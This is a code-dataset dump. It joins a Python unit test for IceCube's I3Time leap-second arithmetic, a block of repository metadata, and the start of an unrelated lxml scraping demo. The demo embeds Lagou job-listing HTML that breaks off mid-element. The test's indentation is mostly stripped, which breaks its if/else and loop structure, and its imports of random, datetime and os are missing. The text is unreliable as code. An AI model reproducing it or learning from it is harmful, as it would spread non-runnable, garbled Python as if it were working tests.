from icecube import dataclasses
from icecube.icetray import I3Units
random.seed(42) # Make repeatable
def approx_Equal(x, y, tolerance=0.001):
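    # relative comparison: |x - y| <= tolerance * midpoint of x and y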
return abs(x-y) <= 0.5 * tolerance * (x + y)
now = datetime.datetime.now()
filename = os.path.join(os.getenv("I3_TESTDATA"),'dataclasses','tai-utc.dat')
# store the Modified Julian Dates of days with leap seconds here
leap_sec_mjd = []
# The first 13 lines of this file contain an older way to do leap seconds which aren't supported
for line in open(filename).readlines()[13:]:
    # columns 17-23 contain the Julian date of the day after a leap second
    # subtract 2400000 to obtain the modified Julian date
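    # a typical post-1972 line looks roughly like:
    # 1972 JAN  1 =JD 2441317.5  TAI-UTC=  10.0       S + (MJD - 41317.) X 0.0      S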
leap_sec_mjd.append(int(line[17:24])-2400000)
#first make sure first leap second is JAN 1, 1972
assert(leap_sec_mjd[0]==41317)
# test every day from 1970 to three years past the later of today and the last listed leap second
for mjd in range(40587,max(dataclasses.make_I3Time(now).mod_julian_day,leap_sec_mjd[-1])+3*365):
if mjd+1 in leap_sec_mjd:
if not dataclasses.leap_second_on_mjd(mjd):
err_str = "MJD "+str(mjd)+" not in I3Time list of leap seconds, "\
"possibly a leap second was added and I3Time.cxx needs to be updated"
raise Exception(err_str)
elif dataclasses.leap_second_on_mjd(mjd):
        err_str = str(mjd)+" incorrectly registers as a leap second"
raise Exception(err_str)
# instantiate I3Time for leap second testing
t1=dataclasses.I3Time()
t2=dataclasses.I3Time()
#check every year from 1970 to 3 years in the future
for year in range (1970,max(dataclasses.year_of(leap_sec_mjd[-1]),now.year)+3):
    # twelve hours before the transition to July
    t1.set_utc_cal_date(year,6,30,12, 0, 0,0)
    # twelve hours after the transition to July
    t2.set_utc_cal_date(year,7, 1,12, 0, 0,0)
    # true if this June-July transition has a leap second
leap_sec = t2.mod_julian_day in leap_sec_mjd
#test I3Time-I3Time
#difference between t1 and t2 should be 86400 seconds +/- one leap second
assert (t1-t2)/I3Units.second+86400 == -leap_sec
assert (t2-t1)/I3Units.second-86400 == leap_sec
#test I3Time+double and I3Time-double
if leap_sec:
        # if a leap second is present, adding one day and one second should get
        # you to noon the next day
assert(t1+86401*I3Units.second==t2)
assert(t2-86401*I3Units.second==t1)
else:
        # with no leap second present, adding exactly one day should get
        # you to noon the next day
assert(t1+86400*I3Units.second==t2)
assert(t2-86400*I3Units.second==t1)
    # re-initialize t1, t2, and t3
t1=dataclasses.I3Time()
t2=dataclasses.I3Time()
t3=dataclasses.I3Time()
if leap_sec:
        # set to the leap second itself
nanosec = random.randint(0,1e9)
t1.set_utc_cal_date(year,6,30,23,59,59,nanosec)
t2.set_utc_cal_date(year,6,30,23,59,60,nanosec)
t3.set_utc_cal_date(year,7, 1, 0, 0, 0,nanosec)
assert not t1.is_leap_second
assert t2.is_leap_second
assert not t3.is_leap_second
# Python's date time doesn't handle leap seconds,
# so it sets the time to 23:59:59.999999
dt1=t1.date_time
dt2=t2.date_time
dt3=t3.date_time
assert dt1 == datetime.datetime(year,6,30,23,59,59,int(nanosec/1000.))
assert dt1+datetime.timedelta(0, 1) == datetime.datetime(year,7, 1, 0, 0, 0,int(nanosec/1000.))
assert dt2 == datetime.datetime(year,6,30,23,59,59,999999)
assert dt3 == datetime.datetime(year,7, 1, 0, 0, 0,int(nanosec/1000.))
assert dt3+datetime.timedelta(0,-1) == datetime.datetime(year,6,30,23,59,59,int(nanosec/1000.))
        # although invalid, the Python leap second objects return true when compared to each other
assert (t1+1*I3Units.second).date_time == dt2
assert (t1+2*I3Units.second).date_time == dt3
assert (t2+1*I3Units.second).date_time == dt3
assert (t2-1*I3Units.second).date_time == dt1
assert (t3-1*I3Units.second).date_time == dt2
assert (t3-2*I3Units.second).date_time == dt1
assert t1.mod_julian_day == t2.mod_julian_day
assert t1.mod_julian_day +1 == t3.mod_julian_day
assert t1.mod_julian_day not in leap_sec_mjd
assert t3.mod_julian_day in leap_sec_mjd
assert int(t1.mod_julian_day_double) == t1.mod_julian_day
assert int(t2.mod_julian_day_double) == t2.mod_julian_day
assert int(t3.mod_julian_day_double) == t3.mod_julian_day
assert approx_Equal(t1.mod_julian_day_double , t2.mod_julian_day_double,1e-10)
assert approx_Equal(t1.mod_julian_day_double + 1/86400., t3.mod_julian_day_double,1e-10)
assert t1.mod_julian_nano_sec == nanosec
assert t2.mod_julian_nano_sec == nanosec
assert t3.mod_julian_nano_sec == nanosec
assert t1.mod_julian_sec == 86399
assert t2.mod_julian_sec == 86400
assert t3.mod_julian_sec == 0
assert t2.unix_time + 1 == t3.unix_time
assert t1.unix_time + 1 == t3.unix_time
assert t1.unix_time == (t3.mod_julian_day-40587)*86400 -1
assert t2.unix_time == (t3.mod_julian_day-40587)*86400 -1
assert t3.unix_time == (t3.mod_julian_day-40587)*86400
assert t3.utc_daq_time - t2.utc_daq_time == 1e10
assert t2.utc_daq_time - t1.utc_daq_time == 1e10
assert t3.utc_daq_time - t1.utc_daq_time == 2e10
assert t1.utc_daq_time == ( 181 + int(year%4==0) )*int(8.64e14) + nanosec*10 - int(1e10)
assert t2.utc_daq_time == ( 181 + int(year%4==0) )*int(8.64e14) + nanosec*10
assert t3.utc_daq_time == ( 181 + int(year%4==0) )*int(8.64e14) + nanosec*10 + int(1e10)
assert t1.utc_day_of_month == 30
assert t2.utc_day_of_month == 30
assert t3.utc_day_of_month == 1
assert t1.utc_month == dataclasses.I3Time.Jun
assert t2.utc_month == dataclasses.I3Time.Jun
assert t3.utc_month == dataclasses.I3Time.Jul
assert t1.utc_nano_sec == nanosec
assert t2.utc_nano_sec == nanosec
assert t3.utc_nano_sec == nanosec
#181 days precede July 1 in standard years and 182 in leap years
assert t1.utc_sec == (181+ int(year%4==0))*86400 - 1
assert t2.utc_sec == (181+ int(year%4==0))*86400
assert t3.utc_sec == (181+ int(year%4==0))*86400 + 1
assert t1.utc_year==year
assert t2.utc_year==year
assert t3.utc_year==year
#test that it prints out the leap second correctly
assert t1.get_utc_string("%Y-%m-%d %H:%M:%S")=="%4d-06-30 23:59:59"%t1.utc_year
assert t2.get_utc_string("%Y-%m-%d %H:%M:%S")=="%4d-06-30 23:59:60"%t1.utc_year
assert t3.get_utc_string("%Y-%m-%d %H:%M:%S")=="%4d-07-01 00:00:00"%t1.utc_year
#test arithmetic
assert(t1+ I3Units.second==t2)
assert(t2+ I3Units.second==t3)
assert(t1+2*I3Units.second==t3)
assert(t3- I3Units.second==t2)
assert(t2- I3Units.second==t1)
assert(t3-2*I3Units.second==t1)
assert(t2-t1== I3Units.second)
assert(t3-t2== I3Units.second)
assert(t3-t1==2*I3Units.second)
assert(t1-t2== -I3Units.second)
assert(t2-t3== -I3Units.second)
assert(t1-t3==-2*I3Units.second)
else:
nanosec = random.randint(0, int(1e9))
t1.set_utc_cal_date(year,6,30,23,59,59,nanosec)
t2.set_utc_cal_date(year,6,30,23,59,60,nanosec)
t3.set_utc_cal_date(year,7, 1, 0, 0, 0,nanosec)
assert t2 == dataclasses.I3Time()
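#(setting the nonexistent 23:59:60 on a day with no leap second leaves t2 at its default value)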
assert not t1.is_leap_second
assert not t3.is_leap_second
dt1=t1.date_time
dt3=t3.date_time
assert dt1 == datetime.datetime(year,6,30,23,59,59,int(nanosec/1000.))
assert dt1+datetime.timedelta(0, 1) == datetime.datetime(year,7, 1, 0, 0, 0,int(nanosec/1000.))
assert dt3 == datetime.datetime(year,7, 1, 0, 0, 0,int(nanosec/1000.))
assert dt3+datetime.timedelta(0,-1) == datetime.datetime(year,6,30,23,59,59,int(nanosec/1000.))
#although invalid, the Python datetimes derived from the leap second still compare equal to each other
assert (t1+1*I3Units.second).date_time == dt3
assert (t3-1*I3Units.second).date_time == dt1
assert t1.mod_julian_day +1 == t3.mod_julian_day
assert t1.mod_julian_day not in leap_sec_mjd
assert t3.mod_julian_day not in leap_sec_mjd
assert int(t1.mod_julian_day_double) == t1.mod_julian_day
assert int(t3.mod_julian_day_double) == t3.mod_julian_day
assert approx_Equal(t1. mod_julian_day_double + 1/86400. , t3.mod_julian_day_double,1e-10)
assert t1.mod_julian_nano_sec == nanosec
assert t3.mod_julian_nano_sec == nanosec
assert t1.mod_julian_sec == 86399
assert t3.mod_julian_sec == 0
#as per NTP, the Unix time of a leap second is the next second's Unix time
assert t1.unix_time + 1 == t3.unix_time
assert t1.unix_time == (t3.mod_julian_day-40587)*86400 -1
assert t3.unix_time == (t3.mod_julian_day-40587)*86400
assert t3.utc_daq_time - t1.utc_daq_time == 1e10
assert t1.utc_daq_time == ( 181 + int(year%4==0) )*int(8.64e14) + nanosec*10 - int(1e10)
assert t3.utc_daq_time == ( 181 + int(year%4==0) )*int(8.64e14) + nanosec*10
assert t1.utc_day_of_month == 30
assert t3.utc_day_of_month == 1
assert t1.utc_month == dataclasses.I3Time.Jun
assert t3.utc_month == dataclasses.I3Time.Jul
assert t1.utc_nano_sec == nanosec
assert t3.utc_nano_sec == nanosec
#181 days precede July 1 in standard years and 182 in leap years
assert t1.utc_sec == (181+ int(year%4==0))*86400 - 1
assert t3.utc_sec == (181+ int(year%4==0))*86400
assert t1.utc_year==year
assert t3.utc_year==year
#test that the times print correctly (no leap second in this branch)
assert t1.get_utc_string("%Y-%m-%d %H:%M:%S")=="%4d-06-30 23:59:59"%t1.utc_year
assert t3.get_utc_string("%Y-%m-%d %H:%M:%S")=="%4d-07-01 00:00:00"%t1.utc_year
#test arithmetic
assert(t1+1*I3Units.second==t3)
assert(t3-1*I3Units.second==t1)
assert(t3-t1== 1*I3Units.second)
assert(t1-t3==-1*I3Units.second)
#do everything again with the year transition instead of the June-July transition
t1.set_utc_cal_date(year ,12,31,12, 0, 0,0)
t2.set_utc_cal_date(year+1, 1, 1,12, 0, 0,0)
leap_sec = t2.mod_julian_day in leap_sec_mjd
assert (t1-t2)/I3Units.second+86400 == -leap_sec
assert (t2-t1)/I3Units.second-86400 == leap_sec
if leap_sec:
assert(t1+86401*I3Units.second==t2)
assert(t2-86401*I3Units.second==t1)
else:
assert(t1+86400*I3Units.second==t2)
assert(t2-86400*I3Units.second==t1)
#re-initialize t1, t2, and t3
t1=dataclasses.I3Time()
t2=dataclasses.I3Time()
t3=dataclasses.I3Time()
if leap_sec:
#set t2 to the leap second itself
nanosec = random.randint(0, int(1e9))
t1.set_utc_cal_date(year ,12,31,23,59,59,nanosec)
t2.set_utc_cal_date(year ,12,31,23,59,60,nanosec)
t3.set_utc_cal_date(year+1, 1, 1, 0, 0, 0,nanosec)
assert not t1.is_leap_second
assert t2.is_leap_second
assert not t3.is_leap_second
# Python's datetime doesn't handle leap seconds,
# so it sets the time to 23:59:59.999999
dt1=t1.date_time
dt2=t2.date_time
dt3=t3.date_time
assert dt1 == datetime.datetime(year ,12,31,23,59,59,int(nanosec/1000.))
assert dt1+datetime.timedelta(0, 1) == datetime.datetime(year+1, 1, 1, 0, 0, 0,int(nanosec/1000.))
assert dt2 == datetime.datetime(year ,12,31,23,59,59,999999)
assert dt3 == datetime.datetime(year+1, 1, 1, 0, 0, 0,int(nanosec/1000.))
assert dt3+datetime.timedelta(0,-1) == datetime.datetime(year ,12,31,23,59,59,int(nanosec/1000.))
#although invalid, the Python datetimes derived from the leap second still compare equal to each other
assert (t1+1*I3Units.second).date_time == dt2
assert (t1+2*I3Units.second).date_time == dt3
assert (t2+1*I3Units.second).date_time == dt3
assert (t2-1*I3Units.second).date_time == dt1
assert (t3-1*I3Units.second).date_time == dt2
assert (t3-2*I3Units.second).date_time == dt1
assert t1.mod_julian_day == t2.mod_julian_day
assert t1.mod_julian_day +1 == t3.mod_julian_day
assert t1.mod_julian_day not in leap_sec_mjd
assert t3.mod_julian_day in leap_sec_mjd
assert int(t1.mod_julian_day_double) == t1.mod_julian_day
assert int(t2.mod_julian_day_double) == t2.mod_julian_day
assert int(t3.mod_julian_day_double) == t3.mod_julian_day
assert approx_Equal(t1.mod_julian_day_double , t2.mod_julian_day_double, 1e-10)
assert approx_Equal(t1.mod_julian_day_double + 1/86400., t3.mod_julian_day_double, 1e-10)
assert t1.mod_julian_nano_sec == nanosec
assert t2.mod_julian_nano_sec == nanosec
assert t3.mod_julian_nano_sec == nanosec
assert t1.mod_julian_sec == 86399
assert t2.mod_julian_sec == 86400
assert t3.mod_julian_sec == 0
assert t2.unix_time + 1 == t3.unix_time
assert t1.unix_time + 1 == t3.unix_time
assert t1.unix_time == (t3.mod_julian_day-40587)*86400 -1
assert t2.unix_time == (t3.mod_julian_day-40587)*86400 -1
assert t3.unix_time == (t3.mod_julian_day-40587)*86400
sec_in_year = ( 365 + int(year%4==0) ) * 86400 + int( t1.mod_julian_day-183 in leap_sec_mjd)
assert t2.utc_daq_time - t1.utc_daq_time == 1e10
assert t3.utc_daq_time == nanosec*10
assert (t1 + 2e9).utc_daq_time == nanosec*10
assert (t2 + 1e9).utc_daq_time == nanosec*10
assert t1.utc_daq_time == ( sec_in_year -1 )*int(1e10) + nanosec*10
assert t2.utc_daq_time == ( sec_in_year )*int(1e10) + nanosec*10
assert t1.utc_day_of_month == 31
assert t2.utc_day_of_month == 31
assert t3.utc_day_of_month == 1
assert t1.utc_month == dataclasses.I3Time.Dec
assert t2.utc_month == dataclasses.I3Time.Dec
assert t3.utc_month == dataclasses.I3Time.Jan
assert t1.utc_nano_sec == nanosec
assert t2.utc_nano_sec == nanosec
assert t3.utc_nano_sec == nanosec
assert t1.utc_sec == sec_in_year - 1
assert t2.utc_sec == sec_in_year
assert t3.utc_sec == 0
assert t1.utc_year==year
assert t2.utc_year==year
assert t3.utc_year==year + 1
#test that it prints out the leap second correctly
assert t1.get_utc_string("%Y-%m-%d %H:%M:%S")=="%4d-12-31 23:59:59"%t1.utc_year
assert t2.get_utc_string("%Y-%m-%d %H:%M:%S")=="%4d-12-31 23:59:60"%t1.utc_year
assert t3.get_utc_string("%Y-%m-%d %H:%M:%S")=="%4d-01-01 00:00:00"%t3.utc_year
#test arithmetic
assert(t1+ I3Units.second==t2)
assert(t2+ I3Units.second==t3)
assert(t1+2*I3Units.second==t3)
assert(t3- I3Units.second==t2)
assert(t2- I3Units.second==t1)
assert(t3-2*I3Units.second==t1)
assert(t2-t1== I3Units.second)
assert(t3-t2== I3Units.second)
assert(t3-t1==2*I3Units.second)
assert(t1-t2== -I3Units.second)
assert(t2-t3== -I3Units.second)
assert(t1-t3==-2*I3Units.second)
else:
nanosec = random.randint(0, int(1e9))
t1.set_utc_cal_date(year ,12,31,23,59,59,nanosec)
t2.set_utc_cal_date(year ,12,31,23,59,60,nanosec)
t3.set_utc_cal_date(year+1, 1, 1, 0, 0, 0,nanosec)
assert t2==dataclasses.I3Time()
assert not t1.is_leap_second
assert not t3.is_leap_second
dt1=t1.date_time
dt3=t3.date_time
assert dt1 == datetime.datetime(year ,12,31,23,59,59,int(nanosec/1000.))
assert dt1+datetime.timedelta(0, 1) == datetime.datetime(year+1, 1, 1, 0, 0, 0,int(nanosec/1000.))
assert dt3 == datetime.datetime(year+1, 1, 1, 0, 0, 0,int(nanosec/1000.))
assert dt3+datetime.timedelta(0,-1) == datetime.datetime(year ,12,31,23,59,59,int(nanosec/1000.))
#although invalid, the Python datetimes derived from the leap second still compare equal to each other
assert (t1+1*I3Units.second).date_time == dt3
assert (t3-1*I3Units.second).date_time == dt1
assert t1.mod_julian_day +1 == t3.mod_julian_day
assert t1.mod_julian_day not in leap_sec_mjd
assert t3.mod_julian_day not in leap_sec_mjd
assert int(t1.mod_julian_day_double) == t1.mod_julian_day
assert int(t3.mod_julian_day_double) == t3.mod_julian_day
assert approx_Equal(t1. mod_julian_day_double + 1/86400., t3.mod_julian_day_double,1e-10)
assert t1.mod_julian_nano_sec == nanosec
assert t3.mod_julian_nano_sec == nanosec
assert t1.mod_julian_sec == 86399
assert t3.mod_julian_sec == 0
#as per NTP, the Unix time of a leap second is the next second's Unix time
assert t1.unix_time + 1 == t3.unix_time
assert t1.unix_time == (t3.mod_julian_day-40587)*86400 -1
assert t3.unix_time == (t3.mod_julian_day-40587)*86400
sec_in_year = ( 365 + int(year%4==0) ) * 86400 + int( t1.mod_julian_day-183 in leap_sec_mjd)
assert t3.utc_daq_time == nanosec*10
assert (t1 + 1e9).utc_daq_time == nanosec*10
assert t1.utc_daq_time == ( sec_in_year -1 )*int(1e10) + nanosec*10
assert t1.utc_day_of_month == 31
assert t3.utc_day_of_month == 1
assert t1.utc_month == dataclasses.I3Time.Dec
assert t3.utc_month == dataclasses.I3Time.Jan
assert t1.utc_nano_sec == nanosec
assert t3.utc_nano_sec == nanosec
assert t1.utc_sec == sec_in_year - 1
assert t3.utc_sec == 0
assert t1.utc_year==year
assert t3.utc_year==year + 1
#test that the times print correctly (no leap second in this branch)
assert t1.get_utc_string("%Y-%m-%d %H:%M:%S")=="%4d-12-31 23:59:59"%t1.utc_year
assert t3.get_utc_string("%Y-%m-%d %H:%M:%S")=="%4d-01-01 00:00:00"%t3.utc_year
#test arithmetic
assert(t1+1*I3Units.second==t3)
assert(t3-1*I3Units.second==t1)
assert(t3-t1== 1*I3Units.second)
assert(t1-t3==-1*I3Units.second)
#set the range of days to span two years before the first and two years after the last leap second
d_start = leap_sec_mjd[ 0]-365*2
d_stop = leap_sec_mjd[-1]+365*2
a=[]
b=[]
#do a lot of trials
for i in range(10000):
#pick two random days
d1 = random.randint(d_start,d_stop)
d2 = random.randint(d_start,d_stop)
ns = random.randint(0, int(1e9))
#make I3Times at noon of those days
t1.set_mod_julian_time(d1,43200,ns)
t2.set_mod_julian_time(d2,43200,ns)
#calculate how many leap seconds between those days
if d1> d2:
leap_seconds = sum([ x<=d1 and x>d2 for x in leap_sec_mjd])
else:
leap_seconds = -sum([ x>d1 and x<=d2 for x in leap_sec_mjd])
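#e.g. (illustrative): if d1 is 2015-07-01 (MJD 57204) and d2 is 2015-06-30, the single
#entry 57204 satisfies x<=d1 and x>d2, so the noon-to-noon gap is 86401 s, not 86400 s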
#check that the delta is correct
assert int((t1-t2)/I3Units.second) == (d1-d2)*86400 + leap_seconds
#check that I3Time + double arithmetic is correct
time_delta = ((d2-d1)*86400- leap_seconds)*I3Units.second
assert(t1 + time_delta == t2)
assert(t2 - time_delta == t1)
print("Leap second test successful, (you can ignore the errors about 'Invalid second: 60!')")
avg_line_length: 39.348659 | max_line_length: 109 | alphanum_fraction: 0.634177
(remaining per-file quality-signal columns omitted)

hexsha: 86e434ce86d2a788348dd975202cf547479816c8 | size: 47,418 | ext: py | lang: Python
max_stars_repo_path: nz_crawl_demo/day3/demo1.py | max_stars_repo_name: gaohj/nzflask_bbs | max_stars_repo_head_hexsha: 36a94c380b78241ed5d1e07edab9618c3e8d477b | max_stars_repo_licenses: ["Apache-2.0"] | null | null | null
max_issues_repo_path: nz_crawl_demo/day3/demo1.py | max_issues_repo_name: gaohj/nzflask_bbs | max_issues_repo_head_hexsha: 36a94c380b78241ed5d1e07edab9618c3e8d477b | max_issues_repo_licenses: ["Apache-2.0"] | 27 | 2020-02-12T07:55:58.000Z | 2022-03-12T00:19:09.000Z
max_forks_repo_path: nz_crawl_demo/day3/demo1.py | max_forks_repo_name: gaohj/nzflask_bbs | max_forks_repo_head_hexsha: 36a94c380b78241ed5d1e07edab9618c3e8d477b | max_forks_repo_licenses: ["Apache-2.0"] | 2 | 2020-02-18T01:54:55.000Z | 2020-02-21T11:36:28.000Z
from lxml import etree
text = """
<ul class="item_con_list" style="display: block;">
<li class="con_list_item first_row default_list" data-index="0" data-positionid="3580958" data-salary="18k-25k" data-company="众禄金融" data-positionname="python工程师" data-companyid="50285" data-hrid="1509336" data-tpladword="0">
<div class="list_item_top">
<div class="position">
<div class="p_top">
<a class="position_link" href="https://www.lagou.com/jobs/3580958.html" target="_blank" data-index="0" data-lg-tj-id="8E00" data-lg-tj-no="
0101
" data-lg-tj-cid="3580958" data-lg-tj-abt="dm-csearch-useUserAllInterest|0">
<h3 style="max-width: 180px;">python工程师</h3>
<span class="add">[<em>罗湖区</em>]</span>
</a>
<span class="format-time">3天前发布</span>
<input type="hidden" class="hr_portrait" value="">
<input type="hidden" class="hr_name" value="石经理">
<input type="hidden" class="hr_position" value="招聘经理">
<input type="hidden" class="target_hr" value="1509336">
<input type="hidden" class="target_position" value="3580958">
<div class="chat_me" data-lg-tj-id="1WI0" data-lg-tj-no="0101" data-lg-tj-cid="50285" data-lg-tj-track-code="search_code" data-lg-tj-track-type="1"></div>
<i class="pos_icon pos_icon_12"></i></div>
<div class="p_bot">
<div class="li_b_l">
<span class="money">18k-25k</span>
<!--<i></i>-->经验3-5年 / 大专
</div>
</div>
</div>
<div class="company">
<div class="company_name">
<a href="https://www.lagou.com/gongsi/50285.html" target="_blank" data-lg-tj-id="8F00" data-lg-tj-no="
0101
" data-lg-tj-cid="50285" data-lg-tj-abt="dm-csearch-useUserAllInterest|0">众禄金融</a><i class="company_mark"><span>该企业已上传营业执照并通过资质验证审核</span></i>
</div>
<div class="industry">
移动互联网,金融 / 上市公司
</div>
</div>
<div class="com_logo">
<a href="https://www.lagou.com/gongsi/50285.html" target="_blank" data-lg-tj-id="8G00" data-lg-tj-no="
0101
" data-lg-tj-cid="50285" data-lg-tj-abt="dm-csearch-useUserAllInterest|0"><img src="//static.lagou.com/thumbnail_120x120/i/image2/M00/18/65/CgotOVn65YSAAu7lAAAVwDCKc5w606.png" alt="众禄金融" width="60" height="60"></a>
</div>
</div>
<div class="list_item_bot">
<div class="li_b_l">
<span>金融</span>
<span>信息安全</span>
<span>php</span>
<span>Java</span>
<span>web</span>
</div>
<div class="li_b_r">“互联网金融,高速发展,五险一金,金融中心”</div>
</div>
</li>
<li class="con_list_item default_list" data-index="1" data-positionid="3172437" data-salary="10k-15k" data-company="乐易网络" data-positionname="python开发工程师" data-companyid="33627" data-hrid="569371" data-tpladword="0">
<div class="list_item_top">
<div class="position">
<div class="p_top">
<a class="position_link" href="https://www.lagou.com/jobs/3172437.html" target="_blank" data-index="1" data-lg-tj-id="8E00" data-lg-tj-no="
0102
" data-lg-tj-cid="3172437" data-lg-tj-abt="dm-csearch-useUserAllInterest|0">
<h3 style="max-width: 180px;">python开发工程师</h3>
<span class="add">[<em>南山区</em>]</span>
</a>
<span class="format-time">2天前发布</span>
<input type="hidden" class="hr_portrait" value="i/image/M00/4C/88/CgpFT1lwWhiAB5C2AAD55Ttkxck626.jpg">
<input type="hidden" class="hr_name" value="Tina">
<input type="hidden" class="hr_position" value="HR">
<input type="hidden" class="target_hr" value="569371">
<input type="hidden" class="target_position" value="3172437">
<div class="chat_me" data-lg-tj-id="1WI0" data-lg-tj-no="0102" data-lg-tj-cid="33627" data-lg-tj-track-code="search_code" data-lg-tj-track-type="1">
<div class="chat_pop_up">
<span class="arrow"></span>
<dl class="chat_main clearfix">
<dt><div class="chat_qrcode"><canvas width="116" height="116"></canvas></div></dt>
<dd>
<dl class="chat_head clearfix">
<dt>
<img class="hr_headpic" src="https://static.lagou.com/i/image/M00/4C/88/CgpFT1lwWhiAB5C2AAD55Ttkxck626.jpg" alt="hr头像" width="62" height="62">
</dt>
<dd>
<div class="hr_name">Tina</div>
<div class="hr_position">HR</div>
</dd>
<dd class="tips_text">Hi,对我发布的职位感兴趣?用拉勾APP扫码,直接和我聊聊吧!</dd>
</dl>
</dd>
</dl>
</div>
</div>
</div>
<div class="p_bot">
<div class="li_b_l">
<span class="money">10k-15k</span>
<!--<i></i>-->经验3-5年 / 本科
</div>
</div>
</div>
<div class="company">
<div class="company_name">
<a href="https://www.lagou.com/gongsi/33627.html" target="_blank" data-lg-tj-id="8F00" data-lg-tj-no="
0102
" data-lg-tj-cid="33627" data-lg-tj-abt="dm-csearch-useUserAllInterest|0">乐易网络</a><i class="company_mark"><span>该企业已上传营业执照并通过资质验证审核</span></i>
</div>
<div class="industry">
移动互联网,游戏 / A轮
</div>
</div>
<div class="com_logo">
<a href="https://www.lagou.com/gongsi/33627.html" target="_blank" data-lg-tj-id="8G00" data-lg-tj-no="
0102
" data-lg-tj-cid="33627" data-lg-tj-abt="dm-csearch-useUserAllInterest|0"><img src="//static.lagou.com/thumbnail_120x120/i/image/M00/57/05/CgqKkVfOIv6AQwyPAAEg94dso0Q147.png" alt="乐易网络" width="60" height="60"></a>
</div>
</div>
<div class="list_item_bot">
<div class="li_b_l">
<span>php</span>
<span>MySQL</span>
<span>后端</span>
</div>
<div class="li_b_r">“五险一金,年终奖金”</div>
</div>
</li>
<li class="con_list_item default_list" data-index="2" data-positionid="3088129" data-salary="10k-20k" data-company="对酒当歌" data-positionname="python开发工程师" data-companyid="32901" data-hrid="557623" data-tpladword="0">
<div class="list_item_top">
<div class="position">
<div class="p_top">
<a class="position_link" href="https://www.lagou.com/jobs/3088129.html" target="_blank" data-index="2" data-lg-tj-id="8E00" data-lg-tj-no="
0103
" data-lg-tj-cid="3088129" data-lg-tj-abt="dm-csearch-useUserAllInterest|0">
<h3 style="max-width: 180px;">python开发工程师</h3>
<span class="add">[<em>宝安区</em>]</span>
</a>
<span class="format-time">2天前发布</span>
<input type="hidden" class="hr_portrait" value="i/image2/M00/1D/93/CgoB5loJToSAXS5UAAAxRCAgR0I656.jpg">
<input type="hidden" class="hr_name" value="Fiona">
<input type="hidden" class="hr_position" value="HR">
<input type="hidden" class="target_hr" value="557623">
<input type="hidden" class="target_position" value="3088129">
<div class="chat_me" data-lg-tj-id="1WI0" data-lg-tj-no="0103" data-lg-tj-cid="32901" data-lg-tj-track-code="search_code" data-lg-tj-track-type="1"></div>
</div>
<div class="p_bot">
<div class="li_b_l">
<span class="money">10k-20k</span>
<!--<i></i>-->经验1-3年 / 大专
</div>
</div>
</div>
<div class="company">
<div class="company_name">
<a href="https://www.lagou.com/gongsi/32901.html" target="_blank" data-lg-tj-id="8F00" data-lg-tj-no="
0103
" data-lg-tj-cid="32901" data-lg-tj-abt="dm-csearch-useUserAllInterest|0">对酒当歌</a><i class="company_mark"><span>该企业已上传营业执照并通过资质验证审核</span></i>
</div>
<div class="industry">
电子商务,O2O / A轮
</div>
</div>
<div class="com_logo">
<a href="https://www.lagou.com/gongsi/32901.html" target="_blank" data-lg-tj-id="8G00" data-lg-tj-no="
0103
" data-lg-tj-cid="32901" data-lg-tj-abt="dm-csearch-useUserAllInterest|0"><img src="//static.lagou.com/thumbnail_120x120/i/image2/M00/1D/93/CgoB5loJTs6AbgL2AAAxM5rVkG8611.jpg" alt="对酒当歌" width="60" height="60"></a>
</div>
</div>
<div class="list_item_bot">
<div class="li_b_l">
<span>php</span>
<span>Java</span>
<span>MySQL</span>
</div>
<div class="li_b_r">“五险一金,免费班车”</div>
</div>
</li>
<li class="con_list_item default_list" data-index="3" data-positionid="3163697" data-salary="15k-30k" data-company="笨鸟社交" data-positionname="python工程师" data-companyid="84086" data-hrid="3628930" data-tpladword="0">
<div class="list_item_top">
<div class="position">
<div class="p_top">
<a class="position_link" href="https://www.lagou.com/jobs/3163697.html" target="_blank" data-index="3" data-lg-tj-id="8E00" data-lg-tj-no="
0104
" data-lg-tj-cid="3163697" data-lg-tj-abt="dm-csearch-useUserAllInterest|0">
<h3 style="max-width: 180px;">python工程师</h3>
<span class="add">[<em>南山区</em>]</span>
</a>
<span class="format-time">1天前发布</span>
<input type="hidden" class="hr_portrait" value="i/image2/M00/21/C0/CgotOVoTm-KAL5xbAAEYJ1YAVhc922.jpg">
<input type="hidden" class="hr_name" value="马小姐">
<input type="hidden" class="hr_position" value="">
<input type="hidden" class="target_hr" value="3628930">
<input type="hidden" class="target_position" value="3163697">
<div class="chat_me" data-lg-tj-id="1WI0" data-lg-tj-no="0104" data-lg-tj-cid="84086" data-lg-tj-track-code="search_code" data-lg-tj-track-type="1"></div>
<i class="pos_icon pos_icon_12"></i></div>
<div class="p_bot">
<div class="li_b_l">
<span class="money">15k-30k</span>
<!--<i></i>-->经验不限 / 本科
</div>
</div>
</div>
<div class="company">
<div class="company_name">
<a href="https://www.lagou.com/gongsi/84086.html" target="_blank" data-lg-tj-id="8F00" data-lg-tj-no="
0104
" data-lg-tj-cid="84086" data-lg-tj-abt="dm-csearch-useUserAllInterest|0">笨鸟社交</a><i class="company_mark"><span>该企业已上传营业执照并通过资质验证审核</span></i>
</div>
<div class="industry">
企业服务 / B轮
</div>
</div>
<div class="com_logo">
<a href="https://www.lagou.com/gongsi/84086.html" target="_blank" data-lg-tj-id="8G00" data-lg-tj-no="
0104
" data-lg-tj-cid="84086" data-lg-tj-abt="dm-csearch-useUserAllInterest|0"><img src="//static.lagou.com/thumbnail_120x120/i/image/M00/10/1C/CgpFT1jwK86AVr_OAACaAuJFFLw446.png" alt="笨鸟社交" width="60" height="60"></a>
</div>
</div>
<div class="list_item_bot">
<div class="li_b_l">
<span>爬虫</span>
<span>后端</span>
<span>初级</span>
<span>中级</span>
<span>搜索</span>
</div>
<div class="li_b_r">“海量数据”</div>
</div>
</li>
<li class="con_list_item default_list" data-index="4" data-positionid="3867111" data-salary="15k-28k" data-company="博奥特科技" data-positionname="Python工程师" data-companyid="69152" data-hrid="9207315" data-tpladword="0">
<div class="list_item_top">
<div class="position">
<div class="p_top">
<a class="position_link" href="https://www.lagou.com/jobs/3867111.html" target="_blank" data-index="4" data-lg-tj-id="8E00" data-lg-tj-no="
0105
" data-lg-tj-cid="3867111" data-lg-tj-abt="dm-csearch-useUserAllInterest|0">
<h3 style="max-width: 180px;">Python工程师</h3>
<span class="add">[<em>上步</em>]</span>
</a>
<span class="format-time">2天前发布</span>
<input type="hidden" class="hr_portrait" value="i/image2/M00/1C/84/CgoB5loFXcaAMM23AABudjCbyWs865.png">
<input type="hidden" class="hr_name" value="qiuff">
<input type="hidden" class="hr_position" value="招聘部">
<input type="hidden" class="target_hr" value="9207315">
<input type="hidden" class="target_position" value="3867111">
